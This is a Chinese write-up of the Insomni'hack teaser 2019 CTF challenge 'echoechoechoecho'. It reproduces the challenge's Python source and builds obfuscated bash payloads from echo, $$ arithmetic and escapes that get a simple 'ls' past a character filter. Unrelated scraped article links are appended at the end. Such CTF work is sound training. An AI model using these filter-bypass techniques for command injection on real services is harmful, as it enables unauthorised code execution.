Insomni'hack teaser 2019 - Misc - echoechoechoecho
参考链接
题目内容
Echo echo echo echo, good luck
nc 35.246.181.187 1337
解题过程
主要思路是通过精巧的构造绕过过滤。
源代码如下:
#!/usr/bin/env python3
from os import close
from random import choice
import re
from signal import alarm
from subprocess import check_output
from termcolor import colored
alarm(10)
colors = ["red","blue","green","yellow","magenta","cyan","white"]
# thanks http://patorjk.com/software/taag/#p=display&h=0&f=Crazy&t=echo
banner = """
_..._ .-'''-.
.-'_..._''. ' _ \\
__.....__ .' .' '.\ . / /` '. \\
.-'' '. / .' .'| . | \ '
/ .-''"'-. `. . ' < | | ' | '
/ /________\ \| | | | \ \ / /
| || | | | .'''-.`. ` ..' /
\ .-------------'. ' | |/.'''. \ '-...-'`
\ '-.____...---. \ '. .| / | |
`. .' '. `._____.-'/| | | |
`''-...... -' `-.______ / | | | |
` | '. | '.
'---' '---'
"""
def bye(s=""):
print(s)
print("bye")
exit()
def check_input(payload):
if payload == 'thisfile':
bye(open("/bin/shell").read())
if not all(ord(c) < 128 for c in payload):
bye("ERROR ascii only pls")
if re.search(r'[^();+$\\= \']', payload.replace("echo", "")):
bye("ERROR invalid characters")
# real echolords probably wont need more special characters than this
if payload.count("+") > 1 or \
payload.count("'") > 1 or \
payload.count(")") > 1 or \
payload.count("(") > 1 or \
payload.count("=") > 2 or \
payload.count(";") > 3 or \
payload.count(" ") > 30:
bye("ERROR Too many special chars.")
return payload
print(colored(banner, choice(colors)))
print("Hi, what would you like to echo today? (make sure to try 'thisfile')")
payload = check_input(input())
print("And how often would you like me to echo that?")
count = max(min(int(input()), 10), 0)
payload += "|bash"*count
close(0)
result = check_output(payload, shell=True, executable="/bin/bash")
bye(result.decode())
Payload只能包含部分特殊符号加上echo, 并且有些特殊符号的使用次数有限制。
下面先演示下如何构造ls
ls | bash
等价于下面
echo $'\154\163' | bash
等价于下面
echo echo \$\'\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))+$((10==10))))\\$(($((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10))+$((10==10))+$((10==10))+$((10==10))))\'
等价于下面。做这道题的时候$$的值为10。
echoecho=\; echoechoecho=\( echoechoechoecho=\) echoechoechoechoecho=\+ echoechoechoechoechoecho=\'; echo echo echo \\$\\$echoechoechoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\\\\$$echoechoecho$echoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoechoecho\$$echoechoecho$echoechoecho$$==$$$echoechoechoecho$echoechoechoecho$echoechoechoecho$echoechoechoecho\\$echoechoechoechoechoecho
等价于下面
echo=\=;echo echoecho$echo\\\; echoechoecho$echo\\\( echoechoechoecho$echo\\\) echoechoechoechoecho$echo\\\+ echoechoechoechoechoecho$echo\\\'\; echo echo echo \\\\$\\\\\$echoechoechoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\\\\\\$\$echoechoecho\$echoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoechoecho\\$\$echoechoecho\$echoechoecho\$\$$echo$echo\$\$\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\$echoechoechoecho\\\\\$echoechoechoechoechoecho
Insomni'hack teaser 2019 - Misc - echoechoechoecho的更多相关文章
- Insomni'hack teaser 2019 - Misc - curlpipebash
参考链接 https://ctftime.org/task/7454 题目 Welcome to Insomni'hack teaser 2019! Execute this Bash command ...
- Insomni'hack teaser 2019 - Pwn - 1118daysober
参考链接 https://ctftime.org/task/7459 Linux内核访问用户空间文件:get_fs()/set_fs()的使用 漏洞的patch信息 https://maltekrau ...
- Insomni'hack teaser 2019 - Reverse - beginner_reverse
参考链接 https://ctftime.org/task/7455 题目描述 A babyrust to become a hardcore reverser 点我下载 解题过程 一道用rust写的 ...
- Insomni’hack CTF-l33t-hoster复现分析
题目地址: https://github.com/eboda/insomnihack/tree/master/l33t_hoster 源码如下: <?php if (isset($_GET[&q ...
- CTF各种资源:题目、工具、资料
目录 题目汇总 Reverse 签到题 Web Web中等难度 Crypto 基础网站 各类工具 综合 Web Payloads 逆向 Pwn 取证 题目汇总 这里收集了我做过的CTF题目 Rever ...
- Kangax 的 ES7 兼容性表格
Kangax 的 ES7 兼容性表格 https://kangax.github.io/compat-table/es2016plus/ Sort by Engine type ...
- 2019年上海市大学生网络安全大赛两道misc WriteUp
2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...
- 2019强网杯部分misc&web
0x01 前言 前两天菜鸡+x和几个大哥算是正式参加了一次ctf的线上赛,也是第一次参加这种比赛(前一段时间巨佬也给了我们一个西班牙的比赛,不过不算是正式参赛,做题的时候,比赛已经结束了),没想到出师 ...
- Hack The Box Web Pentest 2019
[20 Points] Emdee five for life [by L4mpje] 问题描述: Can you encrypt fast enough? 初始页面,不管怎么样点击Submit都会显 ...
随机推荐
- C#读取word文档中的内容
原文地址 http://blog.csdn.net/yhrun/article/details/7674540 在使用前需要添加引用巨硬的com组件:Microsoft Word 12.0 objec ...
- React Native商城项目实战02 - 主要框架部分(tabBar)
1.安装插件,cd到项目根目录下执行: $ npm i react-native-tab-navigator --save 2.主框架文件Main.js /** * 主页面 */ import Rea ...
- Eigen中的矩阵及向量运算
Eigen中的矩阵及向量运算 ,[+,+=,-,-=] ,[\*,\*=] ,[.transpose()] ,[.dot(),.cross(),.adjoint()] ,针对矩阵元素进行的操作[.su ...
- oracle备份和还原
用exp命令即可完成,但要看具体的备份方式. 1. 导出一个完整数据库 exp system/manager file=bible_db log=dible_db full=y 2. 导出数据库定义而 ...
- C# Setting.settings . 用法
1.定义 在Settings.settings文件中定义配置字段.把作用范围定义为:User则运行时可更改,Applicatiion则运行时不可更改.可以使用数据网格视图,很方便: 2.读取配置值 t ...
- 阶段3 1.Mybatis_12.Mybatis注解开发_4 mybatis注解开发CRUD的其他操作
delete 51已经被删除掉了. 查询一个 findUserByName模糊查询 带百分号的情况 value这个参数是固定的 返回值为int类型的
- C#正则的使用
c#使用正则表达式要用到System.Text.RegularExprssions命名空间 官方API Regex类是用于匹配表达式: 通常Regex分为静态类和实例化俩种方式.那这俩种有什么区别呢, ...
- 【算法与数据结构】并查集 Disjoint Set
并查集(Disjoint Set)用来判断已有的数据是否构成环. 在构造图的最小生成树(Minimum Spanning Tree)时,如果采用 Kruskal 算法,每次添加最短路径前,需要先用并查 ...
- FLUME安装&环境(一):netcat类型配置
1.下载软件 在 /opt/deploy 下新建 flume 文件夹: # mkdir / opt/deploy / flume 到Flume官网上http://flume.apache.org/do ...
- 【读书笔记】GitHub入门
代码管理方式--集中与分散 集中型 以 Subversion 为代表的集中型,所示将仓库集中存放在服务器之中,所以只存在一个仓库.这就是为什么这种版本管理系统会被称作集中型. 集中型将所有数据集中存放 ...